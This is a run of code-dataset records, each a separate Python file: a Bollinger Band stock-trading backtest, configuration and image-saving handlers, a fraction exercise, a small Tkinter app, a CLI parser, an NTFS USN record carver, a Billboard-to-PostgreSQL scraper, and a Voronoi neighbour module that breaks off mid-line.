new_df['Buy_Signal_Normal'] = buy_or_sell_call(new_df)[0]\n new_df['Sell_Signal'] = buy_or_sell_call(new_df)[1]\n new_df['Buy_Signal_Lower_Band'] = buy_or_sell_call(new_df)[2]\n pd.set_option('display.max_columns', None) # or 1000\n pd.set_option('display.max_rows', None) # or 1000\n pd.set_option('display.max_colwidth', None) # or 199\n # print (new_df)\n\n # When the buy call is generated. At the same time, look at the price of the lower BB. 
if in the next 10 days price goes below it then sell.\n # days_ahead = 1\n # for p in new_df['Buy_Signal_Normal']:\n # if not math.isnan(p):\n # index = index = getIndex(new_df['Buy_Signal_Normal'], p)\n # if len(new_df) - index > days_ahead:\n # for b in range(index, index + days_ahead):\n # if new_df['Close'][b] > new_df['Lower_band'][index]:\n # pass\n # else:\n # new_df['Sell_Signal'][b] = new_df['Close'][b]\n # else:\n # for b in range(index, len(new_df)):\n # if new_df['Close'][b] > new_df['Lower_band'][index]:\n # pass\n # else:\n # new_df['Sell_Signal'][b] = new_df['Close'][b]\n\n # Combine the two buy lists into 1 list\n new_df['Buy_Signal'] = np.nan\n l = 0\n while l < len(new_df['Buy_Signal_Normal']):\n if math.isnan(new_df['Buy_Signal_Normal'][l]) and math.isnan(new_df['Buy_Signal_Lower_Band'][l]):\n new_df['Buy_Signal'][l] = np.nan\n elif not math.isnan(new_df['Buy_Signal_Normal'][l]):\n new_df['Buy_Signal'][l] = new_df['Buy_Signal_Normal'][l]\n else:\n new_df['Buy_Signal'][l] = new_df['Buy_Signal_Lower_Band'][l]\n l += 1\n\n new_df['stop_margin'] = new_df['Buy_Signal'] * 0.25 # 10% RETURNS\n\n # The following block of code gives a sell signal every time you meet your target price (10% of the price you bought at)\n new_df['Sell'] = np.nan\n for Buy_Price in new_df['Buy_Signal']:\n flag = 1\n if not math.isnan(Buy_Price):\n index = getIndex(new_df['Buy_Signal'], Buy_Price)\n for j in range(index, len(new_df)):\n if new_df['Close'][j] > Buy_Price + new_df['stop_margin'][index] and flag == 1:\n new_df['Sell'][j] = new_df['Close'][j]\n flag = 0\n\n # This block of code gives another buy signal if the closing price doesnt go below middle BB 2 days after selling through target price\n new_df['Buy'] = np.nan\n for Sell_Price in new_df['Sell']:\n flag = 1\n if not math.isnan(Sell_Price):\n index = getIndex(new_df['Sell'], Sell_Price)\n numDaysAhead = 2\n condition = True\n if len(new_df['Close']) - index > (numDaysAhead + 1):\n for i in range(index, index + numDaysAhead + 1):\n if new_df['Close'][i] > new_df['Middle_band'][i]:\n condition = condition and True\n else:\n condition = condition and False\n if condition == True:\n new_df['Buy'][index + numDaysAhead] = new_df['Close'][index + numDaysAhead]\n else:\n for i in range(index, len(new_df['Close'])):\n if new_df['Close'][i] > new_df['Middle_band'][i]:\n condition = condition and True\n else:\n condition = condition and False\n if condition == True:\n new_df['Buy'][index + (len(new_df['Close']) - i - 1)] = new_df['Close'][\n index + (len(new_df['Close']) - i - 1)]\n\n # This is to combine the 2 buy and sell lists with each other to create 2 final lists: Final_Buy and Final_Sell\n new_df['Final_Buy'] = np.nan\n new_df['Final_Sell'] = np.nan\n i = 0\n while i < len(new_df['Buy_Signal']):\n if math.isnan(new_df['Buy_Signal'][i]) and math.isnan(new_df['Buy'][i]):\n new_df['Final_Buy'][i] = np.nan\n elif not math.isnan(new_df['Buy_Signal'][i]):\n new_df['Final_Buy'][i] = new_df['Buy_Signal'][i]\n else:\n new_df['Final_Buy'][i] = new_df['Buy'][i]\n\n if math.isnan(new_df['Sell_Signal'][i]) and math.isnan(new_df['Sell'][i]):\n new_df['Final_Sell'][i] = np.nan\n elif not math.isnan(new_df['Sell_Signal'][i]):\n new_df['Final_Sell'][i] = new_df['Sell_Signal'][i]\n else:\n new_df['Final_Sell'][i] = new_df['Sell'][i]\n i += 1\n\n # The following block of code gets the value of BB squeeze\n new_df['BB_Squeeze'] = np.nan\n\n threshold_days = 30\n max_breaks = 0\n band_width_value = 0.24\n i = 0\n consecutive = 0\n breaks = 0\n\n while i < 
len(new_df):\n if new_df['Band_width'][i] < band_width_value:\n consecutive += 1\n else:\n breaks += 1\n if breaks > max_breaks:\n consecutive = 0\n breaks = 0\n if consecutive >= threshold_days:\n new_df['BB_Squeeze'][i] = consecutive\n i += 1\n\n # This part gets the index of the BB Squeeze\n new_df['test'] = np.nan\n f = 0\n sequence = 0\n index = 0\n while f < len(new_df['BB_Squeeze']):\n if not math.isnan(new_df['BB_Squeeze'][f]):\n flag = 1\n sequence += 1\n if math.isnan(new_df['BB_Squeeze'][f]):\n flag = 0\n if sequence > 0:\n index += getIndex(new_df['BB_Squeeze'][index:], ((threshold_days - 1) + sequence))\n new_df['test'][index] = sequence\n flag = 1\n sequence = 0\n f += 1\n\n # This code checks the closing price before the last BB squeeze value. If it goes above the top bracket, then buy\n # If it goes below the bottom bracket, then sell\n days_to_check_closing_price = 9\n days_not_to_generate_buy_or_sell_call = 16\n\n for value in new_df['test']:\n if not math.isnan(value):\n index = getIndex(new_df['test'], value)\n\n for i in range(index - days_to_check_closing_price, index):\n if new_df['Close'][i] > new_df['Upper_band'][i]:\n new_df['Final_Buy'][i] = new_df['Close'][i]\n if (len(new_df['Close']) - i) > days_not_to_generate_buy_or_sell_call:\n for days in range(0, days_not_to_generate_buy_or_sell_call):\n new_df['Final_Sell'][i + days] = np.nan\n else:\n for days in range(0, (len(new_df['Close']) - i)):\n new_df['Final_Sell'][i + days] = np.nan\n\n if new_df['Close'][i] < new_df['Lower_band'][i]:\n new_df['Final_Sell'][i] = new_df['Close'][i]\n if (len(new_df['Close']) - i) > days_not_to_generate_buy_or_sell_call:\n for days in range(0, days_not_to_generate_buy_or_sell_call):\n new_df['Final_Buy'][i + days] = np.nan\n else:\n for days in range(0, (len(new_df['Close']) - i)):\n new_df['Final_Buy'][i + days] = np.nan\n\n if not math.isnan(new_df['Final_Buy'][-1]):\n print (stock + \" BUY\")\n if not math.isnan(new_df['Final_Sell'][-1]):\n print (stock + \" SELL\")\n\n\n # This part calculates the return on investment, percentage gain, etc.\n money = 0\n number_of_stocks = 0\n investment = 0\n a = 0\n invests = []\n while a < (len(new_df['Buy'])):\n if not math.isnan(new_df['Final_Buy'][a]):\n money = money - new_df['Final_Buy'][a]\n investment = investment + new_df['Final_Buy'][a]\n number_of_stocks = number_of_stocks + 1\n invests.append(money)\n\n elif not math.isnan(new_df['Final_Sell'][a]):\n money = money + (new_df['Final_Sell'][a] * number_of_stocks)\n number_of_stocks = 0\n invests.append(money)\n\n a += 1\n\n if number_of_stocks > 0:\n money = money + number_of_stocks * new_df['Close'][-1]\n number_of_stocks = 0\n\n investment = abs(min(invests))\n percentage_return = (money / investment) * 100\n final_money = investment + money\n\n # print('We gained:', money)\n # print(\"Money invested: \", investment)\n # print(\"Now you have: \", final_money)\n print(\"Percentage return: \", percentage_return, '%')\n # print(\"number of stocks in hand: \", number_of_stocks)\n\n pp = (new_df[\"Close\"][-1] / new_df[\"Close\"][0])-1\n\n bot = (final_money/investment)-1\n final = bot - pp\n\n\n print (new_df['Close'][-1])\n\n # This part simply generates a plot of the closing price, with all the buy and sell signals.\n\n fig = plt.figure(figsize=(12.2, 4.5))\n ax = fig.add_subplot(1, 1, 1)\n x_axis = new_df.index\n ax.fill_between(x_axis, new_df['Upper_band'], new_df['Lower_band'], color='grey')\n ax.plot(x_axis, new_df['Close'], color='gold', lw=3, label='Close Price',\n alpha=0.5) 
# Plot closing price and moving average\n ax.plot(x_axis, new_df['Middle_band'], color='blue', lw=3, label='Simple Moving Average', alpha=0.5)\n ax.scatter(x_axis, new_df['Final_Buy'], color='green', lw=3, label='Buy', marker='^', alpha=1)\n ax.scatter(x_axis, new_df['Final_Sell'], color='red', lw=3, label='Sell', marker='v', alpha=1)\n ax.set_title(stock)\n ax.set_xlabel(\"Date\")\n ax.set_ylabel(\"Price\")\n plt.xticks(rotation=45)\n ax.legend()\n plt.show()\n\n return final, pp, bot\n\nstock_list = []\npp = []\nbot = []\nfinal =[]\n\nfor stock in stocksIown:\n test(stock)\n #stock_list.append(stock)\n #excel = pd.DataFrame()\n #excel['Stocks'] = stock_list\n #final.append(test(stock)[0])\n #pp.append(test(stock)[1])\n #bot.append(test(stock)[2])\n #excel['final'] = final\n #excel ['pp'] = pp\n #excel ['bot'] = bot\n #excel.to_excel(r'/Users/arjun/Desktop/FINAL TESTING.xlsx', index=False, header=True)\n\n#print (excel)\n\n\n","sub_path":"Testing The Bot/generating graphs for each stock.py","file_name":"generating graphs for each stock.py","file_ext":"py","file_size_in_byte":15761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"618135882","text":"import os\nimport sys\nimport tarfile\nimport cStringIO\nif not os.path.dirname(__file__) in sys.path:\n sys.path.append(os.path.dirname(__file__))\nimport configuring\n\n\nclass StaticConfiguringHandler(configuring.ConfiguringHandler):\n\n def create_configuration(self):\n\n # create in-memory buffer\n f = cStringIO.StringIO()\n archive = tarfile.open(mode='w', fileobj=f)\n\n # add file or folder to archive\n src_path = self.config[\"src_path\"]\n src_path = os.path.expandvars(src_path)\n archive_path = self.config[\"archive_path\"]\n archive.add(src_path, arcname=archive_path)\n\n #\n c = configuring.ConfigurationArchive()\n c.archive_buffer = f.getvalue()\n c.instance_role = self.config[\"instance_role\"]\n\n return c\n\n\nclass BundleConfiguringHandler(configuring.ConfiguringHandler):\n\n def create_configuration(self):\n names = self.config[\"configuration\"]\n return configuring.create_configuration_bundle(\n self.service, names)\n","sub_path":"apps/msaas/bin/configuring_handlers.py","file_name":"configuring_handlers.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"193958194","text":"\"\"\"ForeCut \\\\ Pipeline :: Save image(s)\"\"\"\n\nimport os\n\nimport skimage.io\n\nfrom forecut_pipeline.pipeline import Pipeline\n\n\nclass SaveImage(Pipeline):\n \"\"\"Pipeline task to save images.\"\"\"\n\n def __init__(self, src, path, image_ext=\"png\"):\n self.src = src\n self.path = path\n self.image_ext = image_ext\n\n super().__init__()\n\n def map(self, data):\n image = data[self.src]\n image_id = data[\"image_id\"]\n\n # Prepare output for image based on image_id\n output = image_id.split(os.path.sep)\n dirname = output[:-1]\n if len(dirname) > 0:\n dirname = os.path.join(*dirname)\n dirname = os.path.join(self.path, dirname)\n os.makedirs(dirname, exist_ok=True)\n else:\n dirname = self.path\n filename = f\"{output[-1].rsplit('.', 1)[0]}.{self.image_ext}\"\n path = os.path.join(dirname, filename)\n\n skimage.io.imsave(\n path, image,\n )\n\n return 
data\n","sub_path":"trashpanda-ds/pipeline/Mask_RCNN/forecut_pipeline/save_image.py","file_name":"save_image.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637958314","text":"''' For today's challenge, you will get a list of fractions\nwhich you will add together and produce the resulting fraction,\nreduced as far as possible.\n'''\n\ndef factors(n):\n ''' int -> list\n Return a list of factors of n\n '''\n lst = []\n for x in range(1, n):\n if n % x == 0:\n lst.append(x)\n return lst\n\ndef reduce_fraction(n, n2):\n ''' number -> tuple\n Return a fraction reduced\n to its factors '''\n temp = 0\n temp2 = 0\n\n master_lst = []\n master_lst2 = []\n lst1 = (factors(n))\n lst2 = (factors(n2))\n master_lst.extend(lst1)\n master_lst.extend(lst2)\n\n for items in master_lst:\n if items not in master_lst2:\n master_lst2.append(items)\n\n for x in range(0, len(master_lst2)):\n num = master_lst2[x]\n if n % num == 0 and n2 % num == 0:\n div = n / master_lst2[x]\n div2 = n2 / master_lst2[x]\n\n temp = div\n temp2 = div2\n\n return (int(div), int(div2))\n\nif __name__ == '__main__':\n amount = input('How many fractions? ')\n amount = int(amount)\n lst = []\n n = 0\n while n != amount:\n fraction = (input('Enter fraction in the form \"a/b\" '))\n lst.append(fraction)\n n += 1\n\n product = 1\n denominator = 1\n\n for fract in lst:\n seperator = fract.index('/')\n\n # product of denominators\n denominator = int(fract[seperator + 1:])\n # multiply and add denominator to product\n product *= denominator\n\n\n mult = 0\n temp = 0\n\n for y in lst:\n # seperator, index of forward slash\n seperator = y.index('/')\n numerator = y[:seperator]\n denominator = int(y[seperator + 1:])\n numerator = int(numerator)\n mult += int((product / denominator) * numerator)\n ans = reduce_fraction(product, mult)\n\n print('Answer = {0}/{1}'.format(ans[1], ans[0]))","sub_path":"albums/3/challenge226_easy/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"386402313","text":"import Tkinter as tk\nimport ttk, sys, obj\nclass Application(tk.Frame):\n\tdef __init__(self, master=None):\n\t\tprint('initializing')\n\t\ttk.Frame.__init__(self, master)\n\t\tself.master.title('Application')\n\t\tself.grid()\n\t\tself.createWidgets()\n\tdef createWidgets(self):\n\t\tself.quitButton = ttk.Button(self, text='Quit', command=self.quit)\n\t\tself.quitButton.grid()\n\n\t\tself.testButton = ttk.Button(self, text='Test', command=obj.load)\n\t\tself.testButton.grid()\n\tdef quit(self):\n\t\tprint('terminating')\n\t\tsys.exit()\n\nApplication().mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"429783330","text":"f = open(\"DATA11.txt\", \"r\")\n\nfor q in range(10):\n input = list(map(int, f.readline().split()))\n n = input[0]\n m = input[1]\n key = [[], [], [], []]\n for i in range(0,4):\n key[i] = list(f.readline().split())\n a = list(f.readline())\n a.insert(0, '')\n\n for k in range(m-1):\n\n a[-1] = a[1]\n a[0] = a[-2]\n b = a[:]\n\n for i in range(n):\n x = a[i]\n y = a[i+2]\n z = x + y\n for j in range(len(key)):\n if key[j][0] == z:\n b[i+1] = key[j][1]\n break\n a = b[:]\n print(''.join((a[1:n+1])))\n 
f.readline()","sub_path":"2017_regional/P1.py","file_name":"P1.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"147371165","text":"def sort_by_name_length(members_list: list):\n    members_list.sort(key=lambda member: member['age'])\n    return sorted(members_list, key=lambda member: len(member['name']))\n\n\nif __name__ == '__main__':\n    import copy\n    from utils.task_1 import members as MEMBERS\n\n    members = copy.deepcopy(MEMBERS)\n\n    print(members)\n    print(sort_by_name_length(members))\n","sub_path":"week2/lesson2-intro-to-functional/homework/EugeneZabolotny/utils/task_6.py","file_name":"task_6.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"305976397","text":"import argparse\nfrom typing import Type\nfrom dataclasses import dataclass\n\nfrom pyinsights.__version__ import __version__\n\n\n@dataclass\nclass CliOption:\n    config: str\n    fmt: str\n    profile: str\n    region: str\n    quiet: bool\n    output: str\n\n\ndef parse_args() -> Type[CliOption]:\n    \"\"\"Parse arguments\n\n    Returns:\n        Type[CliOption]\n    \"\"\"\n\n    parser = argparse.ArgumentParser(\n        prog=\"pyinsights\",\n        description=\"AWS CloudWatch Logs Insights is wrapped by Python\",\n    )\n\n    parser.add_argument(\n        \"-c\",\n        \"--config\",\n        required=True,\n        default=\"pyinsights.yml\",\n        help=\"PyInsights config file path\",\n    )\n\n    parser.add_argument(\n        \"-f\",\n        \"--format\",\n        choices=[\"json\", \"table\"],\n        default=\"json\",\n        dest=\"fmt\",\n        help='Output format \"json\" or \"table\"',\n    )\n\n    parser.add_argument(\"-p\", \"--profile\", help=\"AWS profile name\")\n\n    parser.add_argument(\"-r\", \"--region\", help=\"AWS region\")\n\n    parser.add_argument(\"-o\", \"--output\", help=\"Output the result to file\")\n\n    parser.add_argument(\n        \"-q\",\n        \"--quiet\",\n        action=\"store_true\",\n        help=\"Suppress progress spinner and messages\",\n    )\n\n    parser.add_argument(\n        \"-v\", \"--version\", action=\"version\", version=__version__\n    )\n\n    return parser.parse_args(namespace=CliOption)\n","sub_path":"pyinsights/cli/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"392588775","text":"from six.moves import builtins\n\nc1 = complex()\nd1 = dict()\nf1 = float()\ni1 = int()\nl1 = list()\ns1 = str()\nt1 = tuple()\n\nc2 = builtins.complex()\nd2 = builtins.dict()\nf2 = builtins.float()\ni2 = builtins.int()\nl2 = builtins.list()\ns2 = builtins.str()\nt2 = builtins.tuple()\n","sub_path":"testing/resources/builtin_constructors.py","file_name":"builtin_constructors.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"55211818","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport mmap\nimport struct\nimport contextlib\nfrom argparse import ArgumentParser\n\ndef carveUsnRecords(inFile, outFile):\n    with contextlib.closing(mmap.mmap(inFile.fileno(), 0, access=mmap.ACCESS_READ)) as m:\n        offset = 0\n        while True:\n            offset = m.find(b'\\x00\\x00\\x02\\x00\\x00\\x00', offset)\n            if offset == -1:\n                break\n\n            if m.find(b'\\x00\\x3c\\x00', offset + 55, offset + 58) == -1:\n                offset +=1\n                continue\n\n            offset -= 2\n            recordLength = struct.unpack('<I', m[offset:offset + 4])[0]\n\n            if recordLength < 60 or recordLength > 570:\n                offset += 3\n                continue\n\n            outFile.write(m[offset:offset + recordLength])\n            offset += 
(recordLength)\n\ndef main():\n p = ArgumentParser()\n p.add_argument(\"-f\", \"--file\", help=\"Carve USN records from the given file\", required=True)\n p.add_argument(\"-o\", \"--outfile\", help=\"Output to the given file\", required=True)\n args = p.parse_args()\n with open(args.file, \"rb\") as i:\n with open(args.outfile, \"ab\") as o:\n carveUsnRecords(i, o)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"usn_carve.py","file_name":"usn_carve.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"392971050","text":"import numpy as np\nimport time\n\nA = np.ones((10000, 10000), order='F')\n\nt0 = time.time()\n\nfor i in range(10000):\n A[:,i] *= 2.0 # scaling each column\n\nprint(time.time()-t0) # 0.119 second\n\nt0 = time.time()\nfor i in range(10000):\n A[i, :]*= 2.0 # scaling each row\n\nprint(time.time()-t0) # 1.574 seconds\n","sub_path":"Chap_11_Numpy/Chap_11_Numpy_RowStorage.py","file_name":"Chap_11_Numpy_RowStorage.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"372632900","text":"from Entreprise import Entreprise\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndata = dict()\nfor a in range(1993, 2017):\n for m in range(12):\n for j in range(31):\n nomfichier = str(a)\n if (m + 1) < 10:\n nomfichier += '0' + str(m + 1)\n else:\n nomfichier += str(m + 1)\n if (j + 1) < 10:\n nomfichier += '0' + str(j + 1)\n else:\n nomfichier += str(j + 1)\n\n try:\n f = open(\"data/\"+ nomfichier +\".txt\", 'r')\n print(\"Importation du fichier\", nomfichier)\n i = 0\n for l in f:\n l = l[:-1]\n l = l.split('\\t')\n key = l[0]\n if key not in data:\n data[key] = Entreprise(key, l[1])\n data[key].add_ouverture(a, m+1, j, l[2])\n except:\n pass\n\nfig, axs = plt.subplots(nrows=2, ncols=1, sharex=True, sharey=True)\nx = np.arange('2016-01-01', '2016-12-31', dtype='datetime64[D]')\nkeys = ['ES0109429037', 'FR0010425595']\n\nlists = [[], []]\nolds = [0, 0]\nfor d in list(x):\n date = str(d).split('-')\n print(date)\n for i in range(2):\n k = keys[i]\n v = data[k].ouvertures[int(date[0])][int(date[1])][int(date[2])-1]\n if v != None:\n olds[i] = v\n lists[i].append(olds[i])\n\nfor i in range(2):\n axs[i].plot(x, lists[i], label=data[keys[i]].libele)\n axs[i].legend()\n\nplt.show()\n","sub_path":"tp-big-data/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160515613","text":"from typing import List\n\nfrom k8s_handle.templating import get_template_contexts\nfrom k8s_handle.exceptions import ResourceNotAvailableError\n\nfrom .resource_getters import AbstractResourceGetter\n\n\nclass ResourceAvailabilityChecker(object):\n\n def __init__(self, resources_getters: List[AbstractResourceGetter]):\n self.resources = resources_getters\n self.versions = {}\n\n def _is_available_kind(self, api_group: str, kind: str) -> bool:\n kinds = []\n for api in self.resources:\n if api.is_processable_version(api_group):\n kinds = api.get_resources_by_version(api_group)\n\n return kind in kinds\n\n def run(self, file_path: str):\n for template_body in get_template_contexts(file_path):\n if not self._is_available_kind(template_body.get('apiVersion'), template_body.get('kind')):\n raise ResourceNotAvailableError(\n \"The resource with kind {} is not supported with version {}. 
File: {}\".format(\n template_body.get('kind'), template_body.get('apiVersion'), file_path\n )\n )\n","sub_path":"k8s_handle/k8s/availability_checker/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"363822917","text":"#!/usr/bin/python3\r\n\r\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\r\n\r\npdf_document = \"X.pdf\"\r\npdf = PdfFileReader(pdf_document)\r\n\r\n# Output files for new PDFs\r\noutput_filename_even = \"even_reversed.pdf\"\r\noutput_filename_odd = \"odd.pdf\"\r\n\r\npdf_writer_even = PdfFileWriter()\r\npdf_writer_odd = PdfFileWriter()\r\n\r\n# Get reach page and add it to corresponding\r\n# output file based on page number\r\nfor page in range(pdf.getNumPages()):\r\n if page % 2 == 0:\r\n current_page = pdf.getPage(page)\r\n pdf_writer_odd.addPage(current_page)\r\n\r\nfor page in reversed(range(pdf.getNumPages())):\r\n if page % 2 != 0:\r\n current_page = pdf.getPage(page)\r\n pdf_writer_even.addPage(current_page)\r\n\r\n# Write the data to disk\r\nwith open(output_filename_even, \"wb\") as out:\r\n pdf_writer_even.write(out)\r\n print(\"created\", output_filename_even)\r\n\r\n# Write the data to disk\r\nwith open(output_filename_odd, \"wb\") as out:\r\n pdf_writer_odd.write(out)\r\n print(\"created\", output_filename_odd)","sub_path":"SplitPDF-odd-reversedeven/Odd_ReverseEven_PDF.py","file_name":"Odd_ReverseEven_PDF.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"76886448","text":"import pandas as pd\nimport numpy as np\nimport re\n\ntotal = pd.read_csv('total2.csv')\nfor DeleteAttribute in ['开发商',\"物业类型\",\"总建面积\", \"总户数\", \"建造年代\", \"物业公司\", \"商圈\"]:\n del total[DeleteAttribute]#,'商圈','物业公司']\n#区 地址 每平米价格 竣工日期 物业费 停车位 容积率 绿化率\n# 除了 每平米价格 竣工日期 是数字, 其他都是str,需要转化\npattern_wuyefei = re.compile(r'\\s*(\\d+\\D\\d+)\\D+')\npattern_lvhualv = re.compile(r'\\s*(\\d+)\\D+')\n\nj = 0\nfor i in total['物业费']:\n i = str(i)\n if pattern_wuyefei.search(i) != None:\n total['物业费'][j] = float(pattern_wuyefei.search(i).group(1))\n else:\n total['物业费'][j] = 0\n j = j + 1\n\nj = 0\nfor i in total['停车位']:\n try:\n if i == '暂无数据' or i == None:\n total['停车位'][j] = 0\n else:\n total['停车位'][j] = float(i)\n except:\n ValueError\n j = j + 1\n\nj = 0\nfor i in total['容积率']:\n try:\n if i == '暂无数据' or i == None:\n total['容积率'][j] = 0\n else:\n total['容积率'][j] = float(i)\n j = j + 1\n except:\n ValueError\n\ntotal.to_csv('total3.csv')\n","sub_path":"districts/preprocess2.py","file_name":"preprocess2.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442917299","text":"\"\"\"Use SQL database to store songs scrapped from billboards\"\"\"\n# USAGE: change the CONST parameters in connect to match your database, Use the execute function to execute sql code\nimport psycopg2\nfrom scrap import Scrapper\n\n# -- establish a connection to SQL database --\ndef connect(db=\"music\", user=\"JuliaC\", host=\"127.0.0.1\", port=5432):\n \"\"\" Connect to the PostgreSQL database server \"\"\"\n conn = None\n try:\n print('Connecting to the PostgreSQL database...')\n conn = psycopg2.connect(host=host, database=db, user=user, port=port)\n print(\"connection successful\\n\")\n\n # ---> here is where functions can go to update or scan the database\n dumpV3(conn)\n info(conn)\n # ---> end\n\n 
except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: \", error)\n finally:\n if conn is not None:\n conn.close()\n print('Database connection closed.')\n\n\n# heres where we can put SQL commands inside a cursor object\n# Documentation for Cursor class: http://initd.org/psycopg/docs/cursor.html\n# psql commands: http://www.postgresqltutorial.com/psql-commands/\n\n\n# -- take songs off buildboards and place them into database\ndef dumpV3(conn):\n cur = conn.cursor()\n\n # --- drop tables ---\n cur.execute(\"DROP TABLE IF EXISTS popularity;\")\n cur.execute(\"DROP TABLE IF EXISTS songs;\")\n print(\"--> Cleared tables\")\n\n # --- create song table ---\n table_commands = \"(id SERIAL NOT NULL, title text NOT NULL, artist text NOT NULL ,PRIMARY KEY (id), UNIQUE(title, artist));\"\n cur.execute(\"CREATE TABLE songs\" + table_commands)\n print(\"--> Created songs table\")\n table_commands = \"(songId integer REFERENCES Songs(id),year integer NOT NULL, rank integer NOT NULL, PRIMARY KEY (songId, year), UNIQUE(songId, year), UNIQUE(year, rank));\"\n\n # --- top100 years data ---\n for year in range(1980, 2016):\n # -- load data --\n url = 'http://billboardtop100of.com/' + str(year) + '-2/'\n s = Scrapper(url)\n s.get_rows_SQL() # puts songs into s.table, type: array\n # loop through songs\n for song in s.table:\n # -- insert into songs table --\n inserts = \"INSERT INTO songs(title, artist)\"\n values = \"VALUES(\" \"'\" + song.song + \"', \" + \"'\" + song.artist + \"'\" + \")\"\n cur.execute(inserts + values + \" ON CONFLICT(title, artist) DO NOTHING;\")\n print(\"Added top100 songs for year \", year)\n cur.close()\n conn.commit()\n print(\"changes committed\")\n\n\ndef info(conn):\n cur = conn.cursor()\n # -- run executes to gain info --\n print(\"Running information methods: \")\n cur.execute(\"select * from song ORDER BY songid, year ASC;\")\n\n # -- iterate and print --\n for song in cur:\n print(song) # cur object is iterable\n cur.close()\n\n\n# run script, must set parameters if not using defaults\nif __name__ == '__main__':\n connect(db=\"music\", user=\"JulianC\")\n\n\n","sub_path":"sqltopy.py","file_name":"sqltopy.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"495022164","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import mode\nfrom scipy.spatial import Voronoi, Delaunay\n\nfrom .alpha_shape import alphashape_edges\n\n\n# add 4 corner points\ndef add_corner_points(pts, pad=0.05):\n center = pts.mean(axis=0)\n pts_ = pts - center\n vmax = np.abs(pts_).max() * (1 + pad)\n p1 = (-vmax, -vmax)\n p2 = (+vmax, -vmax)\n p3 = (+vmax, +vmax)\n p4 = (-vmax, +vmax)\n p1234 = np.array([p1, p2, p3, p4])\n pts_new = np.vstack([pts, p1234 + center])\n return pts_new\n\n\ndef locate_vnn_idx(ridge_points_pairs, ii):\n return np.where((ridge_points_pairs[:, 0] == ii) | (ridge_points_pairs[:, 1] == ii))[0]\n\ndef sort_inds(inds, pts):\n inds_ = []\n for i, row in enumerate(inds):\n if row[0] != -1:\n pp = pts[row] - pts[i]\n angles = np.arctan2(pp[:, 1], pp[:, 0]) + np.pi\n row_ = row[np.argsort(angles)]\n inds_.append(row_)\n else:\n inds_.append([-1])\n return inds_\n\nclass VorNeighbors:\n\n def __init__(self, pts, lbs=None, threshold=0.05, alpha=None):\n # input points\n self.pts = pts\n # input points add 4 corners\n self.pts_ = add_corner_points(self.pts)\n\n\n # lbs\n if lbs is None:\n self.lbs = np.ones(len(self.pts)) * (-1)\n else:\n self.lbs = 
lbs\n\n self.lbs_ = np.hstack([self.lbs, [-1] * 4])\n\n\n # boundary indices from alpha shape\n self.boundary = alphashape_edges(pts, alpha)\n\n\n # Voronoi model, generated from pts_, NOT pts\n vor = Voronoi(self.pts_)\n\n # ridges: number of ridges = len(vor.ridge_vertices)\n ridge_vertices_pairs = np.array(vor.ridge_vertices)\n ridge_points_pairs = np.array(vor.ridge_points)\n\n # calculate all ridge lengths\n p12 = vor.vertices[ridge_vertices_pairs[:, 0]] - vor.vertices[ridge_vertices_pairs[:, 1]]\n L = np.hypot(p12[:, 0], p12[:, 1])\n\n # L = np.hypot(p12[:, 0], p12[:, 1])[:, np.newaxis]\n # pairs = np.hstack([ridge_points_pairs, ridge_vertices_pairs, L])\n\n self.inds = []\n for ii in range(len(self.pts)):\n if ii not in self.boundary:\n idx = locate_vnn_idx(ridge_points_pairs, ii)\n # remove neighbors with a small edge\n aa = ridge_points_pairs[idx, 0:2]\n aa[aa == ii] = 0\n bb = aa.sum(axis=1).astype(int)\n l = L[idx]\n s = l / l.sum()\n self.inds.append(bb[s > threshold])\n else:\n self.inds.append([-1])\n\n # sort by angle\n self.inds = sort_inds(self.inds, self.pts_)\n\n self.ks = np.array([len(e) for e in self.inds])\n self.k = mode(self.ks).mode[0]\n\n def get_mols(self, t=0.01):\n mols = []\n\n k_max = np.max([len(row) for row in self.inds]) + 1\n for i, row in enumerate(self.inds):\n a = np.array([-1] * k_max)\n if row[0] == -1:\n mols.append(a)\n else:\n ind = [i] + [e 